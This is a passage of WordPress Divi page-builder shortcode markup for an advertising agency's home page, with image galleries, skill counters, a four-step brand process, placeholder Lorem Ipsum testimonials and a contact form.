inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" 